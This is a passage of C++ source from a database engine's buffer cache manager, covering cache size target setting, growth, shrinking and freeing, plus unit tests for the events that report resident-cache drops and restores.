return g_rgcbPageSize[icb];
}
// sets the new cache size target.
#ifndef RTM
TICK g_tickCacheSetTargetLast = 0;
#endif // !RTM
void BFICacheISetTarget( const LONG_PTR cbfCacheNew )
{
Assert( g_critCacheSizeSetTarget.FOwner() );
Assert( cbfCacheNew > 0 );
OnNonRTM( g_tickCacheSetTargetLast = TickOSTimeCurrent() );
const __int64 cbfCacheTargetInitial = (__int64)cbfCacheTarget;
cbfCacheTarget = cbfCacheNew;
ETCacheLimitResize( cbfCacheTargetInitial, (__int64)cbfCacheTarget );
}
// sets the cache size target to zero during pre-cache init and during cache term
void BFICacheIResetTarget()
{
g_critCacheSizeSetTarget.Enter();
OnNonRTM( g_tickCacheSetTargetLast = TickOSTimeCurrent() );
cbfCacheTarget = 0;
g_cbfCacheTargetOptimal = 0;
g_critCacheSizeSetTarget.Leave();
}
// sets the new cache size target.
void BFICacheSetTarget( OnDebug( const LONG_PTR cbfCacheOverrideCheck ) )
{
g_critCacheSizeSetTarget.Enter();
// -1 means "do not check".
Assert( cbfCacheOverrideCheck == -1 || cbfCacheOverrideCheck > 0 );
// run resource pool size calculation to determine next cache size
// note: this calls BFICacheISetTarget() / sets cbfCacheTarget
g_cacheram.SetOptimalResourcePoolSize();
// the above SetOptimalResourcePoolSize() should have taken into account any cbfCacheOverrideCheck parameter
Assert( ( cbfCacheOverrideCheck == -1 ) || ( cbfCacheTarget >= cbfCacheOverrideCheck ) || BoolParam( JET_paramEnableViewCache ) );
Assert( cbfCacheTarget >= cbfCacheMinMin );
g_critCacheSizeSetTarget.Leave();
}
// grows the cache the cache to the cbfCacheTarget size
#ifndef RTM
TICK g_tickCacheGrowLast = 0;
#endif // !RTM
ERR ErrBFICacheGrow()
{
if ( !g_critCacheSizeResize.FTryEnter() )
{
return ErrERRCheck( JET_errTaskDropped );
}
ERR err = JET_errSuccess;
const LONG_PTR cbfCacheAddressableInitial = cbfCacheAddressable;
const LONG_PTR cbfCacheSizeInitial = cbfCacheSize;
OnNonRTM( g_tickCacheGrowLast = TickOSTimeCurrent() );
// First, we'll try and grow the pool of unquiesced buffers (i.e., the effective cache size) to
// the optimal value. If it fails with OOM we'll at least make sure we have enough to get out
// of a deadlock situation.
BOOL fGrowToAvoidDeadlock = fFalse;
LONG_PTR cbfCacheTargetNew = cbfCacheTarget;
do
{
// Some consistency checks.
if ( g_fBFCacheInitialized )
{
Assert( cbfCacheTargetNew >= cbfCacheMinMin ); // for avail pool limits
Enforce( cbfCacheTargetNew > 0 );
}
else
{
// We are initializing for the first time.
Assert( cbfCacheAddressable == 0 );
Assert( cbfCacheSize == 0 );
}
// Nothing to do, exit fast.
if ( cbfCacheSize >= cbfCacheTargetNew )
{
break;
}
// First, try to unquiesce from the quiesced pool. Remove from the tail (next-most).
PBF pbf = NULL;
while ( ( cbfCacheSize < cbfCacheTargetNew ) && ( ( pbf = g_bfquiesced.NextMost() ) != NULL ) )
{
Assert( pbf->fQuiesced );
pbf->sxwl.ClaimOwnership( bfltWrite );
BFIFreePage( pbf, fFalse );
}
// Bail if unquiescing buffers allowed buffer cache to reach desired point.
const LONG_PTR dcbfCacheSize = cbfCacheTargetNew - cbfCacheSize;
if ( dcbfCacheSize <= 0 )
{
break;
}
const LONG_PTR cbfCacheAddressableNew = cbfCacheAddressable + dcbfCacheSize;
Assert( !g_fBFCacheInitialized || ( cbfCacheAddressableNew <= LONG_PTR( (ULONG_PTR)cCacheChunkMax * (ULONG_PTR)min( g_cbfChunk, g_cpgChunk ) ) ) );
// allocate space for the new cache set point
const ERR errT = ErrBFICacheISetSize( cbfCacheAddressableNew );
Assert( ( cbfCacheAddressable == cbfCacheAddressableNew ) || ( errT < JET_errSuccess ) );
if ( !fGrowToAvoidDeadlock )
{
if ( errT == JET_errOutOfMemory )
{
const LONG_PTR cbfCacheDeadlockT = (LONG_PTR)AtomicReadPointer( (void**)&cbfCacheDeadlock );
// Retrying only makes sense if cbfCacheDeadlock will grow the cache and is less than
// what we've just tried.
if ( ( cbfCacheDeadlockT > cbfCacheSize ) && ( cbfCacheDeadlockT < cbfCacheTargetNew ) )
{
fGrowToAvoidDeadlock = fTrue;
cbfCacheTargetNew = cbfCacheDeadlockT;
}
}
// cache original error to return in case of a retry.
err = errT;
}
else
{
// already retried, bail.
fGrowToAvoidDeadlock = fFalse;
}
} while ( fGrowToAvoidDeadlock );
BFICacheINotifyCacheSizeChanges( cbfCacheAddressableInitial, cbfCacheSizeInitial, cbfCacheAddressable, cbfCacheSize );
g_critCacheSizeResize.Leave();
return err;
}
// deallocates (i.e., decommits + unreserves) as much as possible of the cache from the top of the buffer chunks
void BFICacheIShrinkAddressable()
{
Assert( g_critCacheSizeResize.FOwner() );
const LONG_PTR cbfCacheAddressableInitial = cbfCacheAddressable;
const LONG_PTR cbfCacheSizeInitial = cbfCacheSize;
// find the first unquiesced BF closest to the end of the cache
IBF ibf;
for ( ibf = cbfCacheAddressable - 1; ibf >= 0; ibf-- )
{
PBF pbf = PbfBFICacheIbf( ibf );
if ( !pbf->fQuiesced )
{
break;
}
Assert( !pbf->fAvailable );
Assert( !pbf->fInOB0OL && pbf->ob0ic.FUninitialized() ); // checking up-level dependency: page still not partly dirty.
g_bfquiesced.Remove( pbf );
}
const LONG_PTR cbfCacheAddressableNew = ibf + 1;
Assert( cbfCacheAddressableNew >= cbfCacheMinMin ); // this is only supposed to be called from the async shrink task, so we should never be setting
// the cache size to less than cbfCacheMinMin while the cache is active.
// free all cache beyond this BF
CallS( ErrBFICacheISetSize( cbfCacheAddressableNew ) );
Assert( cbfCacheAddressable == cbfCacheAddressableNew );
// notify about cache size changes
BFICacheINotifyCacheSizeChanges( cbfCacheAddressableInitial, cbfCacheSizeInitial, cbfCacheAddressable, cbfCacheSize );
}
// deallocates (i.e., decommits + unreserves) the entire cache
void BFICacheIFree()
{
Assert( g_critCacheSizeResize.FOwner() );
Assert( cbfCacheTarget == 0 );
const LONG_PTR cbfCacheAddressableInitial = cbfCacheAddressable;
const LONG_PTR cbfCacheSizeInitial = cbfCacheSize;
#ifdef DEBUG
IBF ibf;
// from the highest order buffer that was ever allocated (cbfInit) down to the current
// top (cbfCacheAddressable), everything must be quiesced
for ( ibf = cbfInit - 1; ibf >= cbfCacheAddressable; ibf-- )
{
PBF pbf = PbfBFICacheIbf( ibf );
Assert( pbf->fQuiesced );
Assert( !pbf->fAvailable );
}
// from the current top (cbfCacheAddressable) all the way down, the expected state depends
// on whether the buffer is quiesced or not
for ( ; ibf >= 0; ibf-- )
{
PBF pbf = PbfBFICacheIbf( ibf );
if ( pbf->fQuiesced )
{
Assert( !pbf->fAvailable );
Assert( !pbf->fInOB0OL && pbf->ob0ic.FUninitialized() );
g_bfquiesced.Remove( pbf );
}
else
{
Assert( pbf->fAvailable );
}
}
Assert( g_bfquiesced.FEmpty() );
#endif // DEBUG
// free the entire cache
CallS( ErrBFICacheISetSize( 0 ) );
Assert( cbfCacheAddressable == 0 );
cbfCacheSize = 0;
g_bfquiesced.Empty();
// notify about cache size changes, though probably not relevant right now, as we're terminating the cache.
BFICacheINotifyCacheSizeChanges( cbfCacheAddressableInitial, cbfCacheSizeInitial, cbfCacheAddressable, cbfCacheSize );
}
// notifies about cache size changes, which updates globals and may kick-off tasks for cache size maintenance
void BFICacheINotifyCacheSizeChanges(
const LONG_PTR cbfCacheAddressableInitial,
const LONG_PTR cbfCacheSizeInitial,
const LONG_PTR cbfCacheAddressableFinal,
const LONG_PTR cbfCacheSizeFinal )
{
Assert( g_critCacheSizeResize.FOwner() );
if ( cbfCacheAddressableFinal != cbfCacheAddressableInitial )
{
// set the page hint cache size to an appropriate size given the new
// cache size
CallS( CPAGE::ErrSetPageHintCacheSize( cbfCacheAddressableFinal * sizeof( DWORD_PTR ) ) );
}
if ( ( cbfCacheSizeFinal != cbfCacheSizeInitial ) && ( cbfCacheSizeFinal != 0 ) )
{
(void)ErrBFIMaintCacheStatsRequest( bfmcsrtForce );
}
ETCacheResize( (__int64)cbfCacheAddressableInitial,
(__int64)cbfCacheSizeInitial,
(__int64)cbfCacheAddressableFinal,
(__int64)cbfCacheSizeFinal );
}
void BFIReportCacheStatisticsChanges(
__inout BFCacheStatsChanges* const pstatsBFCacheResidency,
__in const __int64 ftNow,
__in const INT cbfCacheResidentCurrent,
__in const INT cbfCacheCurrent,
// Additional parameters do not affect logic, so zero'ing out by default to avoid a whole bunch
// of unit test fixing.
__in const __int64 cbCommittedCacheSize = 0,
__in const __int64 cbCommitCacheTarget = 0,
__in const __int64 cbTotalPhysicalMemory = 0 );
void BFIReportCacheStatisticsChanges(
__inout BFCacheStatsChanges* const pstatsBFCacheResidency,
__in const __int64 ftNow,
__in const INT cbfCacheResidentCurrent,
__in const INT cbfCacheCurrent,
__in const __int64 cbCommittedCacheSize,
__in const __int64 cbCommitCacheTarget,
__in const __int64 cbTotalPhysicalMemory )
{
Assert ( cbfCacheCurrent >= 0 );
// Cache too small. Bypass computation.
if ( cbfCacheCurrent < 3840 )
{
return;
}
// Bootstrapping. Assume the cache was fully resident.
if ( pstatsBFCacheResidency->ftResidentLastEvent == 0 )
{
pstatsBFCacheResidency->ftResidentLastEvent = ftNow;
pstatsBFCacheResidency->cbfResidentLast = cbfCacheCurrent;
pstatsBFCacheResidency->cbfCacheLast = cbfCacheCurrent;
}
pstatsBFCacheResidency->eResidentCurrentEventType = eResidentCacheStatusNoChange;
pstatsBFCacheResidency->csecLastEventDelta = -1;
eResidentCacheStatusChange eStatus = eResidentCacheStatusNoChange;
const INT pctCacheResidentLowThreshold = 80;
const INT pctCacheResidentDropThreshold = 30;
const INT pctCacheResident = (INT)( ( (__int64)cbfCacheResidentCurrent * 100 ) / cbfCacheCurrent );
const INT pctCacheResidentLast = (INT)( ( (__int64)pstatsBFCacheResidency->cbfResidentLast * 100 ) / pstatsBFCacheResidency->cbfCacheLast );
const INT pctCacheResidentDelta = pctCacheResident - pctCacheResidentLast;
// Issue red event if:
// o Current residency percentage is below threshold and...
// o Last residency percentage was above threshold or residency percentage decreased by more than delta threshold.
//
// Issue green event if:
// o Last residency percentage was below threshold and current residency percentage is above threshold.
if ( ( pctCacheResident < pctCacheResidentLowThreshold ) &&
( ( pctCacheResidentLast >= pctCacheResidentLowThreshold ) || ( -pctCacheResidentDelta > pctCacheResidentDropThreshold ) ) )
{
eStatus = eResidentCacheStatusDrop;
}
else
{
const INT pctCacheResidentNormalThreshold = 85;
C_ASSERT ( pctCacheResidentNormalThreshold > pctCacheResidentLowThreshold );
if ( ( pctCacheResidentLast < pctCacheResidentNormalThreshold ) && ( pctCacheResident >= pctCacheResidentNormalThreshold ) )
{
eStatus = eResidentCacheStatusRestore;
}
}
pstatsBFCacheResidency->eResidentCurrentEventType = eStatus;
if ( eStatus != eResidentCacheStatusNoChange )
{
// Last residency.
WCHAR wszPercentResidentLast[16];
WCHAR wszResidentBuffersLast[16];
WCHAR wszTotalBuffersLast[16];
OSStrCbFormatW( wszPercentResidentLast, sizeof(wszPercentResidentLast), L"%d", pctCacheResidentLast );
OSStrCbFormatW( wszResidentBuffersLast, sizeof(wszResidentBuffersLast), L"%d", pstatsBFCacheResidency->cbfResidentLast );
OSStrCbFormatW( wszTotalBuffersLast, sizeof(wszTotalBuffersLast), L"%d", pstatsBFCacheResidency->cbfCacheLast );
// Elapsed time.
WCHAR wszSecsDelta[24];
pstatsBFCacheResidency->csecLastEventDelta = UtilConvertFileTimeToSeconds( ftNow - pstatsBFCacheResidency->ftResidentLastEvent );
OSStrCbFormatW( wszSecsDelta, sizeof(wszSecsDelta), L"%I64d", pstatsBFCacheResidency->csecLastEventDelta );
// Current residency.
WCHAR wszPercentResident[16];
WCHAR wszResidentBuffers[16];
WCHAR wszTotalBuffers[16];
OSStrCbFormatW( wszPercentResident, sizeof(wszPercentResident), L"%d", pctCacheResident );
OSStrCbFormatW( wszResidentBuffers, sizeof(wszResidentBuffers), L"%d", cbfCacheResidentCurrent );
OSStrCbFormatW( wszTotalBuffers, sizeof(wszTotalBuffers), L"%d", cbfCacheCurrent );
// Current cache size vs. target.
WCHAR wszCachePctOfTarget[70]; wszCachePctOfTarget[0] = L'\0';
WCHAR wszCacheSizeVsTarget[70]; wszCacheSizeVsTarget[0] = L'\0';
WCHAR wszRamSize[70]; wszRamSize[0] = L'\0';
if ( cbCommitCacheTarget && cbTotalPhysicalMemory )
{
const INT pctCacheTarget = (INT)( ( (__int64)cbCommittedCacheSize * 100 ) / cbCommitCacheTarget );
OSStrCbFormatW( wszCachePctOfTarget, sizeof(wszCachePctOfTarget), L"%d", pctCacheTarget );
OSStrCbFormatW( wszCacheSizeVsTarget, sizeof(wszCacheSizeVsTarget),
L"%0.03f / %0.03f",
DblMBs( cbCommittedCacheSize ),
DblMBs( cbCommitCacheTarget ) );
OSStrCbFormatW( wszRamSize, sizeof(wszRamSize),
L"%0.03f",
DblMBs( cbTotalPhysicalMemory ) );
}
// Log event
const WCHAR* rgwsz [] =
{
wszPercentResidentLast,
wszResidentBuffersLast,
wszTotalBuffersLast,
wszSecsDelta,
wszPercentResident,
wszResidentBuffers,
wszTotalBuffers,
wszCachePctOfTarget,
wszCacheSizeVsTarget,
wszRamSize
};
switch ( eStatus )
{
case eResidentCacheStatusDrop:
UtilReportEvent(
eventWarning,
PERFORMANCE_CATEGORY,
RESIDENT_CACHE_HAS_FALLEN_TOO_FAR_ID,
_countof( rgwsz ), rgwsz );
break;
case eResidentCacheStatusRestore:
// Question: for the memory diagnostics workflow, what event ID shall we use?
// Probably we should say similar but ...Resident cache has raise by xx buffers ....
UtilReportEvent(
eventInformation,
PERFORMANCE_CATEGORY,
RESIDENT_CACHE_IS_RESTORED_ID,
_countof( rgwsz ), rgwsz );
break;
}
// Store the last cache values.
pstatsBFCacheResidency->ftResidentLastEvent = ftNow;
pstatsBFCacheResidency->eResidentLastEventType = eStatus;
pstatsBFCacheResidency->cbfResidentLast = cbfCacheResidentCurrent;
pstatsBFCacheResidency->cbfCacheLast = cbfCacheCurrent;
}
}
// Unit tests for residency too low reporting
JETUNITTEST( BF, BFICacheUpdateStatisticsIReportStatsSimple )
{
// BFIReportCacheStatisticsChanges( pstatsBFCacheResidency, ftNow, cbfCacheResidentCurrent, cbfCacheCurrent );
BFCacheStatsChanges statsBFCacheResidency;
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 100000000LL, 20, 20 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Validate a 20% drop does not incite the event if it isn't at least 3840 buffers ...
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 100000000LL, 16, 20 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Reset things / grow the cache ...
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 100000000LL, 100000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Validate a 6% drop does not incite the event, even though it is more than 3840 buffers ..
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 100000000LL, 94000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Validate even a 10% drop does not triggers if we're not at least 20% down ...
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 100000000LL, 88000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Validate we need a total of 10% and 20% total drop from cache size to trigger the event ...
CHECK( statsBFCacheResidency.cbfResidentLast == 100000 );
CHECK( statsBFCacheResidency.cbfCacheLast == 100000 );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 200000000LL, 79000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusDrop );
CHECK( statsBFCacheResidency.csecLastEventDelta == 10 );
// Move the resident size up a tiny bit
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 200000000LL, 83000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// And move it back down a tiny bit, should not event
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 200000000LL, 84000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Keep creeping it down, should not event until at least 30% lost (< 49000)
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 200000000LL, 83000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 200000000LL, 70000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 200000000LL, 49000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
CHECK( statsBFCacheResidency.cbfResidentLast == 79000 );
CHECK( statsBFCacheResidency.cbfCacheLast == 100000 );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 300000000LL, 48999, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusDrop );
CHECK( statsBFCacheResidency.csecLastEventDelta == 10 );
}
// Unit tests for residency cache green event
JETUNITTEST( BF, BFICacheUpdateStatisticsIReportGreenStats )
{
// BFIReportCacheStatisticsChanges( pstatsBFCacheResidency, ftNow, cbfCacheResidentCurrent, cbfCacheCurrent );
BFCacheStatsChanges statsBFCacheResidency;
// Validate we need a total of more than 20% total drop from cache size to trigger the event ...
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 100000000LL, 81000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 100000000LL, 80000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 100000000LL, 79000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusDrop );
CHECK( statsBFCacheResidency.csecLastEventDelta == 0 );
// Move it back up a bit, should event because resident cache >= 85%
CHECK( statsBFCacheResidency.cbfResidentLast == 79000 );
CHECK( statsBFCacheResidency.cbfCacheLast == 100000 );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 200000000LL, 85000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusRestore );
CHECK( statsBFCacheResidency.csecLastEventDelta == 10 );
// Move the resident size up by 10%, should not event because we are already above the normal threshold
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 200000000LL, 95000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// And move it back down, should event cache drop
CHECK( statsBFCacheResidency.cbfResidentLast == 85000 );
CHECK( statsBFCacheResidency.cbfCacheLast == 100000 );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 300000000LL, 79000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusDrop );
CHECK( statsBFCacheResidency.csecLastEventDelta == 10 );
// And move it back up a bit, should not event
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 300000000LL, 82000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// And move it back up a bit, should not event
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 300000000LL, 84000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// And move it back up a bit, should event because resident cache >= 85%
CHECK( statsBFCacheResidency.cbfResidentLast == 79000 );
CHECK( statsBFCacheResidency.cbfCacheLast == 100000 );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 400000000LL, 85000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusRestore );
CHECK( statsBFCacheResidency.csecLastEventDelta == 10 );
// And move it down, should event drop
CHECK( statsBFCacheResidency.cbfResidentLast == 85000 );
CHECK( statsBFCacheResidency.cbfCacheLast == 100000 );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 500000000LL, 74000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusDrop );
CHECK( statsBFCacheResidency.csecLastEventDelta == 10 );
}
JETUNITTEST( BF, BFICacheUpdateStatisticsIReportStatsShrinkingOk )
{
// BFIReportCacheStatisticsChanges( pstatsBFCacheResidency, ftNow, cbfCacheResidentCurrent, cbfCacheCurrent );
BFCacheStatsChanges statsBFCacheResidency;
// Reset to a full cache
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 100000000LL, 100000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// A shrinking cache should not event
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 100000000LL, 91000, 91000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 100000000LL, 86000, 86200 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 100000000LL, 50000, 50000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Now a real loss, should fire an event
CHECK( statsBFCacheResidency.cbfResidentLast == 100000 );
CHECK( statsBFCacheResidency.cbfCacheLast == 100000 );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 200000000LL, 35000, 50000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusDrop );
CHECK( statsBFCacheResidency.csecLastEventDelta == 10 );
}
JETUNITTEST( BF, BFICacheUpdateStatisticsIReportStatsHittingZeroLogsOnce )
{
// BFIReportCacheStatisticsChanges( pstatsBFCacheResidency, ftNow, cbfCacheResidentCurrent, cbfCacheCurrent );
BFCacheStatsChanges statsBFCacheResidency;
// Reset to a full cache
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 100000000LL, 100000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// A shrinking cache should not event
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 100000000LL, 50000, 50000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Now a real loss, should fire an event
CHECK( statsBFCacheResidency.cbfResidentLast == 100000 );
CHECK( statsBFCacheResidency.cbfCacheLast == 100000 );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 200000000LL, 0, 50000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusDrop );
CHECK( statsBFCacheResidency.csecLastEventDelta == 10 );
// Put re-doing with this cache size should not event again ...
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 200000000LL, 0, 50000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
}
JETUNITTEST( BF, BFICacheUpdateStatisticsIReportStatsSevereResidencyLossEvents )
{
// BFIReportCacheStatisticsChanges( pstatsBFCacheResidency, ftNow, cbfCacheResidentCurrent, cbfCacheCurrent );
BFCacheStatsChanges statsBFCacheResidency;
// Reset to a full cache
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 100000000LL, 2300000, 2300000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 100000000LL, 2300000, 2300000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 100000000LL, 2300000, 2300000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// A severe loss should cause an issue
CHECK( statsBFCacheResidency.cbfResidentLast == 2300000 );
CHECK( statsBFCacheResidency.cbfCacheLast == 2300000 );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 200000000LL, 1100000 /* < 50% resident */, 2300000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusDrop );
CHECK( statsBFCacheResidency.csecLastEventDelta == 10 );
}
JETUNITTEST( BF, BFICacheUpdateStatisticsIReportStatsSevereResidencyLossCoincidentWithCacheShrink )
{
// BFIReportCacheStatisticsChanges( pstatsBFCacheResidency, ftNow, cbfCacheResidentCurrent, cbfCacheCurrent );
BFCacheStatsChanges statsBFCacheResidency;
// Reset to a full cache
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 100000000LL, 2300000, 2300000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 100000000LL, 2300000, 2300000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 100000000LL, 2300000, 2300000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// A severe loss should cause an issue
CHECK( statsBFCacheResidency.cbfResidentLast == 2300000 );
CHECK( statsBFCacheResidency.cbfCacheLast == 2300000 );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 200000000LL, 1100000 /* < 50% resident */, 1500000 /* 1/3rd shrink */ );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusDrop );
CHECK( statsBFCacheResidency.csecLastEventDelta == 10 );
}
JETUNITTEST( BF, BFICacheUpdateStatisticsIReportStatsResidencyLossByGrowth )
{
// BFIReportCacheStatisticsChanges( pstatsBFCacheResidency, ftNow, cbfCacheResidentCurrent, cbfCacheCurrent );
BFCacheStatsChanges statsBFCacheResidency;
// Reset to a full cache
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 100000000LL, 100000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Keep absolute residency, decrese percentage (100% -> 66%)
CHECK( statsBFCacheResidency.cbfResidentLast == 100000 );
CHECK( statsBFCacheResidency.cbfCacheLast == 100000 );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 200000000LL, 100000, 150000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusDrop );
CHECK( statsBFCacheResidency.csecLastEventDelta == 10 );
// Keep absolute residency, decrese percentage (66% -> 40%), small decrease, no event
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 200000000LL, 100000, 250000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Keep absolute residency, decrese percentage (40% -> 35%)
CHECK( statsBFCacheResidency.cbfResidentLast == 100000 );
CHECK( statsBFCacheResidency.cbfCacheLast == 150000 );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 300000000LL, 100000, 285714 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusDrop );
CHECK( statsBFCacheResidency.csecLastEventDelta == 10 );
}
JETUNITTEST( BF, BFICacheUpdateStatisticsIReportStatsResidencyIncreaseByShrinkage )
{
// BFIReportCacheStatisticsChanges( pstatsBFCacheResidency, ftNow, cbfCacheResidentCurrent, cbfCacheCurrent );
BFCacheStatsChanges statsBFCacheResidency;
// 50% residency.
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 100000000LL, 100000, 200000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusDrop );
CHECK( statsBFCacheResidency.csecLastEventDelta == 0 );
// Keep absolute residency, increase percentage (50% -> 55%)
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 100000000LL, 100000, 181000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Keep absolute residency, increase percentage (55% -> 84%)
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 100000000LL, 100000, 119047 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Keep absolute residency, increase percentage (84% -> 85%)
CHECK( statsBFCacheResidency.cbfResidentLast == 100000 );
CHECK( statsBFCacheResidency.cbfCacheLast == 200000 );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 200000000LL, 100000, 117000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusRestore );
CHECK( statsBFCacheResidency.csecLastEventDelta == 10 );
// Keep absolute residency, increase percentage (85% -> 100%), no double restore event
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 200000000LL, 100000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
}
JETUNITTEST( BF, BFICacheUpdateStatisticsIReportStatsResidencyLossAndRestoredWithShrink )
{
// BFIReportCacheStatisticsChanges( pstatsBFCacheResidency, ftNow, cbfCacheResidentCurrent, cbfCacheCurrent );
BFCacheStatsChanges statsBFCacheResidency;
// Reset to a full cache
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 100000000LL, 100000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Shrink with cache residency loss
CHECK( statsBFCacheResidency.cbfResidentLast == 100000 );
CHECK( statsBFCacheResidency.cbfCacheLast == 100000 );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 200000000LL, 50000, 75000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusDrop );
CHECK( statsBFCacheResidency.csecLastEventDelta == 10 );
// Shrink with cache residency loss, but increased residency percentage
CHECK( statsBFCacheResidency.cbfResidentLast == 50000 );
